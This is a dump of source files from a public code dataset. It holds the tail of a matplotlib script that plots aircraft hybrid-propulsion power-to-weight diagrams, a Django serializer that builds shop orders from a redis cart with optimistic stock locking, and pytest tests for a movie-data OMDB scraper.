    plt.setp(ax[0].set_title(r'$\bf{Mattingly Method}$'))
    plt.setp(ax[1].set_title(r'$\bf{Gudmundsson Method}$'))
    plt.setp(ax[4:6], xlabel='Wing Load: $W_{TO}$/S (N/${m^2}$)')
    plt.setp(ax[0], ylabel=r'$\bf{Turbofun}$''\n $P_{SL}$/$W_{TO}$ (W/N)')
    plt.setp(ax[2], ylabel=r'$\bf{Motor}$ ''\n $P_{SL}$/$W_{TO}$ (W/N)')
    plt.setp(ax[4], ylabel=r'$\bf{Turbofun+Motor}$' '\n' r'$\bf{vs.Conventional}$ ''\n $P_{SL}$/$W_{TO}$ (W/N)')
    plt.subplots_adjust(bottom=0.15)
    plt.suptitle(r'$\bf{Component}$' ' ' r'$\bf{P_{SL}/W_{TO}}$' ' ' r'$\bf{Diagrams}$'
                 ' ' r'$\bf{After}$' ' ' r'$\bf{Adjust}$' ' ' r'$\bf{Degree-of-Hybridization}$'
                 '\n hp: take-off=' +
                 str(hp[0]) + ' stall-speed=' +
                 str(hp[1]) + ' cruise=' +
                 str(hp[2]) + ' service-ceiling=' +
                 str(hp[3]) + '\n level-turn=@3000m' +
                 str(hp[4]) + ' climb@S-L=' +
                 str(hp[5]) + ' climb@3000m=' +
                 str(hp[6]) + ' climb@7000m=' + str(hp[7]))
    plt.show()
|
[
"libao@gatech.edu"
] |
libao@gatech.edu
|
0c3066f4942d97aa5dca6faff8777426cef86b76
|
326d8b47d8349d3430b0a061e2413fdae8c07f79
|
/meiduo_mall/meiduo_mall/apps/orders/serializers.py
|
149001c7af5e0b37eeff1cd4f70143b9dffd9397
|
[
"MIT"
] |
permissive
|
dienoe/django_demo
|
1d4a9f60d1dd73c315a347eaab25f68ffd5f6cb8
|
bd8201fcc663533123efba9b1b4eee823a288bab
|
refs/heads/master
| 2020-06-13T03:17:37.966680
| 2019-07-23T02:27:00
| 2019-07-23T02:27:00
| 194,515,470
| 0
| 0
|
MIT
| 2019-07-23T02:27:01
| 2019-06-30T12:50:05
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 5,953
|
py
|
from django.db import transaction
from django_redis import get_redis_connection
from rest_framework import serializers
from goods.models import SKU
from orders.models import OrderInfo, OrderGoods
from django.utils import timezone
from decimal import Decimal
import logging
logger=logging.getLogger('django')
class CartSKUSerializer(serializers.ModelSerializer):
    """
    Serializer for a cart line item: SKU model fields plus the quantity
    of that SKU currently in the user's cart.
    """
    # Quantity in the cart; not a model field, so the view must set a
    # `count` attribute on each SKU instance before serializing.
    count = serializers.IntegerField(label='数量')

    class Meta:
        model = SKU
        fields = ('id', 'name', 'default_image_url', 'price', 'count')
class OrderSettlementSerializer(serializers.Serializer):
    """
    Serializer for the order-settlement (checkout preview) response:
    the freight charge plus the selected cart items.
    """
    # Shipping fee, e.g. Decimal('10.00').
    freight = serializers.DecimalField(label='运费', max_digits=10, decimal_places=2)
    # Selected cart items, each rendered by CartSKUSerializer.
    skus = CartSKUSerializer(many=True)
class SaveOrderSerializer(serializers.ModelSerializer):
    """
    Serializer that creates an order (OrderInfo + OrderGoods rows) from the
    SKUs currently selected in the user's redis cart.
    """

    class Meta:
        model = OrderInfo
        fields = ('order_id', 'address', 'pay_method')
        read_only_fields = ('order_id',)
        extra_kwargs = {
            'address': {
                'write_only': True
            },
            'pay_method': {
                'required': True
            }
        }

    def create(self, validated_data):
        """
        Save the order atomically.

        Uses an optimistic-locking retry loop on SKU stock and a database
        savepoint so that a stock conflict or unexpected error never leaves
        a partially written order behind.

        :param validated_data: validated fields ('address', 'pay_method')
        :return: the saved OrderInfo instance
        :raises serializers.ValidationError: empty cart or insufficient stock
        """
        # Current authenticated user.
        user = self.context['request'].user
        # Order id: timestamp plus 9-digit zero-padded user id,
        # e.g. 20180702150101 + 000000042.
        order_id = timezone.now().strftime('%Y%m%d%H%M%S') + ('%09d' % user.id)
        address = validated_data['address']
        pay_method = validated_data['pay_method']
        # Cart lives in redis: a hash of sku_id -> count and a set of the
        # sku_ids the user has ticked for checkout.
        redis_conn = get_redis_connection('cart')
        redis_cart_dict = redis_conn.hgetall('cart_%s' % user.id)
        redis_cart_selected = redis_conn.smembers('cart_selected_%s' % user.id)
        # cart maps only the *selected* sku ids to their counts.
        cart = {}
        for sku_id in redis_cart_selected:
            cart[int(sku_id)] = int(redis_cart_dict[sku_id])
        if not cart:
            raise serializers.ValidationError('没有需要结算的商品')
        # One transaction for the order header and every order line.
        with transaction.atomic():
            # Savepoint lets us undo partial writes on a stock conflict.
            save_id = transaction.savepoint()
            try:
                # Order header; totals are accumulated per line and saved below.
                order = OrderInfo.objects.create(
                    order_id=order_id,
                    user=user,
                    address=address,
                    total_count=0,
                    total_amount=Decimal('0'),
                    freight=Decimal('10.00'),
                    pay_method=pay_method,
                    status=OrderInfo.ORDER_STATUS_ENUM['UNSEND'] if pay_method == OrderInfo.PAY_METHODS_ENUM['CASH'] else
                    OrderInfo.ORDER_STATUS_ENUM['UNPAID']
                )
                sku_id_list = cart.keys()
                for sku_id in sku_id_list:
                    while True:
                        # Re-read the SKU on each attempt for fresh stock.
                        sku = SKU.objects.get(id=sku_id)
                        sku_count = cart[sku.id]
                        origin_stock = sku.stock
                        origin_sales = sku.sales
                        if sku.stock < sku_count:
                            transaction.savepoint_rollback(save_id)
                            raise serializers.ValidationError('商品%s库存不足' % sku.name)
                        new_stock = origin_stock - sku_count
                        # FIX: sales must grow from the original sales figure;
                        # the previous code added the count to origin_stock.
                        new_sales = origin_sales + sku_count
                        # Optimistic lock: update succeeds only if stock is
                        # unchanged since we read it (returns affected rows).
                        result = SKU.objects.filter(id=sku.id, stock=origin_stock).update(
                            stock=new_stock, sales=new_sales)
                        if result == 0:
                            # Someone else bought this SKU first -- retry.
                            continue
                        order.total_count += sku_count
                        order.total_amount += (sku.price * sku_count)
                        # One OrderGoods row per settled cart line.
                        OrderGoods.objects.create(
                            order=order,
                            sku=sku,
                            count=sku_count,
                            price=sku.price,
                        )
                        # Line handled; break out of the retry loop.
                        break
                order.save()
            except serializers.ValidationError:
                raise
            except Exception as e:
                # FIX: log through the module logger (was the root `logging`
                # module) and re-raise -- the old code swallowed the error
                # after rolling back, then returned the rolled-back order and
                # cleared the cart anyway.
                logger.error(e)
                transaction.savepoint_rollback(save_id)
                raise
            else:
                transaction.savepoint_commit(save_id)
        # Remove the settled items from the redis cart (hash and selected set).
        pl = redis_conn.pipeline()
        pl.hdel('cart_%s' % user.id, *redis_cart_selected)
        pl.srem('cart_selected_%s' % user.id, *redis_cart_selected)
        pl.execute()
        return order
|
[
"=410947380@qq.com"
] |
=410947380@qq.com
|
3255da86222829e5b615a12861c570f0d7ed697b
|
fe65b4b23b99b355cd729e01f330b947e430f8b4
|
/qmdb/test/test_omdb.py
|
d84613a4903318c378a1482115b1266571d0483e
|
[] |
no_license
|
tijlk/qmdb
|
b0f0e7c8171d2664a1a2ce906cec419d23b56158
|
206b38e78bcc6855cd48cb24141239ec978896db
|
refs/heads/master
| 2021-01-23T04:00:36.790950
| 2019-01-01T12:24:19
| 2019-01-01T12:24:19
| 86,148,965
| 1
| 0
| null | 2018-04-04T05:12:22
| 2017-03-25T10:17:28
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,235
|
py
|
import pytest
from mock import patch
from qmdb.interfaces.omdb import OMDBScraper, InvalidIMDbIdError
from qmdb.movie.movie import Movie
from qmdb.utils.utils import no_internet
@pytest.mark.skipif(no_internet(), reason='There is no internet connection.')
def test_imdbid_to_rturl_valid_imdbid():
    """A known IMDb id resolves to the expected Rotten Tomatoes URL."""
    scraper = OMDBScraper()
    url = scraper.imdbid_to_rturl(133093)
    assert url == 'http://www.rottentomatoes.com/m/matrix/'
@pytest.mark.skipif(no_internet(), reason='There is no internet connection.')
def test_imdbid_to_rturl_invalid_imdbid():
    """Invalid or missing IMDb ids raise InvalidIMDbIdError."""
    omdb_scraper = OMDBScraper()
    # FIX: the `assert tomato_url is None` statements that used to follow
    # these calls were unreachable dead code -- the call inside the
    # pytest.raises block raises, so control never reached them.
    with pytest.raises(InvalidIMDbIdError):
        omdb_scraper.imdbid_to_rturl(12345678)
    with pytest.raises(InvalidIMDbIdError):
        omdb_scraper.imdbid_to_rturl(None)
@patch.object(OMDBScraper, 'imdbid_to_rturl', lambda self, imdbid: 'http://www.rottentomatoes.com/m/the-matrix/')
def test_refresh_movie():
    """refresh_movie stores the URL produced by (the patched) imdbid_to_rturl."""
    scraper = OMDBScraper()
    refreshed = scraper.refresh_movie(Movie({'crit_id': 1234, 'imdbid': 133093}))
    assert refreshed.tomato_url == 'http://www.rottentomatoes.com/m/the-matrix/'
|
[
"tijl.kindt@gmail.com"
] |
tijl.kindt@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.